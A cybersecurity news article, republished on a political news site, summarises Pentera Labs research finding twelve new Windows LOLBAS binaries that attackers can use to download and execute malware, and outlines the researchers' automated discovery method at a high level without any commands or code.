Connect with us

Hi, what are you looking for?

Hard News Hard Hitting News Source Global Political News

Cyber Security

Researchers Discover 12 New LOLBAS Binaries that are Used by Attackers

Hackers actively leverage LOLBAS (Living-Off-the-Land Binaries-And-Scripts), it’s a popular methodology that is used by threat actors for exploiting legit tools for hiding the illicit actions performed by them.

Since LOLBAS gaining traction at a rapid pace in cyber attacks, so, experts are also actively seeking new methods to detect unknown malicious binaries for better defense mechanisms.

Cybersecurity researchers at Pentera Labs recently discovered new LOLBAS binaries that are actively used by threat actors to deploy malware.

Over 3000 Windows binaries pose the LOLBAS discovery challenge. Even the researchers opted for the automation approach and found 12 new files in 4 weeks, a 30% rise in known downloaders and executors.

LOLBAS: An Evergreen Type of Cyber Attack

LOLBAS has been a known concept in the cyber-security landscape for some time now. However, it continues to gain its pace as one of the most dominant trends in cyber-attacks

While it is important to understand how hackers are constantly seeking to exploit the legitimate tools within your systems and then turn them against you for their illicit purposes. 

Apart from this, due to its exceptional capability to evade detection, LOLBAS still remains a significant concern in cyber attacks. What makes it so powerful is its adeptness at utilizing pre-installed legit system tools to execute malicious actions.

Detection of Binaries

The automated solution generates the download attempt, lists binaries, and then it triggers the downloader via a simple HTTP command structure with two parts. And here below we have mentioned those two parts:-

  • The path of the potential downloader
  • A URL to download the file from
Downloader file (Source – Pentera)

While the second part involves an HTTP server for receiving feedback on download attempts, with log records indicating file download attempts.

Running HTTP server (Source – Pentera)

Experts’ automated method revealed 6 additional downloaders, leading to a 30% boost in the LOLBAS list with a total of 9 discoveries.

In this scenario, a hacker will deploy the LOLBAS downloader to acquire powerful malware and then execute it stealthily using LOLBAS executors, disguising it as legitimate processes.

Here’s how the manual approach looks:-

Manual approach (Source – Pentera)

Besides this, this complete process could be automated via two tools and here they are:-

  • IDApython: It finds API call cross-references and decompiles.
  • ChatGPT: It assists in analyzing function arguments’ connections for a solid POC.

The proposed static approach surpasses the dynamic analysis by focusing on low-level details of the code like:-

  • Automating reverse engineering for deeper code insights
  • Revealing structure
  • Behavior
  • Potential issues

Moreover, this complete analysis offers a proactive defense roadmap, empowering security pros to predict and prevent evolving cyber threats.

Source: https://cybersecuritynews.com/12-new-lolbas-binaries/

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like

Cyber Security

In recent findings from Check Point Research, a significant phishing attack targeting more than 40 prominent Colombian companies has been uncovered.  The attackers behind this campaign...

Cyber Security

According to recent reports, a threat actor has compromised the confidential information of 3,200 Airbus vendors. The exposed data includes sensitive details such as...

Cyber Security

A group of Researchers unearthed critical code Proton Mail vulnerabilities that could have jeopardized the security of Proton Mail, a renowned privacy-focused webmail service. ...

Cyber Security

Telegram Messenger offers global, cloud-based instant messaging with several features:- Cybersecurity researchers at Securlist recently found several Telegram mods on Google Play in various...

Copyright © 2023 Hard News Herd Hitting in Your Face News Source | World News | Breaking News | US News | Political News Website by Top Search SEO